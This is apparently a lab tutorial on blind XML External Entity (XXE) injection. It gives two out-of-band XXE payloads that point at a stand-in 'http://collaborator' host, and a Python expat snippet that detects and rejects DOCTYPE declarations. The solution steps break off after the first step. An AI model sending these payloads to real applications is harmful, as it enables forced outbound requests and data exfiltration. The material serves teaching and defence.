Blind XXE

What is it?

Blind XML External Entity (XXE) vulnerabilities arise when an application processes XML input that includes references to an external entity, but does not return the outcome of the entity processing in the response. This makes the exploitation less direct since the attacker does not receive an immediate output from the injected payload. Blind XXE can be exploited to exfiltrate data, scan internal systems, or execute remote requests within the network that hosts the vulnerable application.

Exploitation

Blind XXE using OOB

<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://collaborator"> ]>
<foo>
  <bar>&xxe;</bar>
</foo>

Blind XXE using OOB with XML parameter entities

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://collaborator"> %xxe; ]>
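
Both payload shapes above depend on the parser accepting a DOCTYPE, so the server-side control is to refuse DTDs before the body reaches application code. The following is an added example, not part of the original page: it uses Python's standard-library expat bindings to report external entity declarations for logging and to gate input. The function names, the `<foo/>` root appended to the parameter-entity sample, and the `stockCheck` body are assumptions made for illustration.

```python
import xml.parsers.expat as expat

# Constructed samples: the two payload shapes shown above plus a benign body.
GENERAL = b'''<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://collaborator"> ]>
<foo>
  <bar>&xxe;</bar>
</foo>'''
# Root element <foo/> appended (constructed) so the document is well-formed.
PARAMETER = b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://collaborator"> %xxe; ]><foo/>'
BENIGN = b"<stockCheck><productId>1</productId></stockCheck>"


def inspect_xml(xml_bytes):
    """Parse without resolving entities; report DTD use and external entity declarations."""
    report = {"doctype": False, "external_entities": []}
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = True

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # A system identifier means the entity's content lives at an external URI.
        if system_id is not None:
            kind = "parameter" if is_param else "general"
            report["external_entities"].append((kind, name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    # No ExternalEntityRefHandler is set, so expat never fetches the URI.
    parser.Parse(xml_bytes, True)
    return report


def is_acceptable(xml_bytes):
    """Gate for untrusted XML: reject malformed input and any DOCTYPE at all.

    Rejecting on DOCTYPE rather than on the entity list matters because expat
    can stop reporting declarations that follow an unresolved %pe; reference.
    """
    try:
        return not inspect_xml(xml_bytes)["doctype"]
    except expat.ExpatError:
        return False


if __name__ == "__main__":
    for label, doc in (("general", GENERAL), ("parameter", PARAMETER), ("benign", BENIGN)):
        print(label, is_acceptable(doc), inspect_xml(doc)["external_entities"])
```

Because the response never reflects the entity, the `external_entities` list is the useful signal to log when a request is rejected.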

Solution

1. Check the stock of an item and send the POST request with XML to Repeater.

2. 
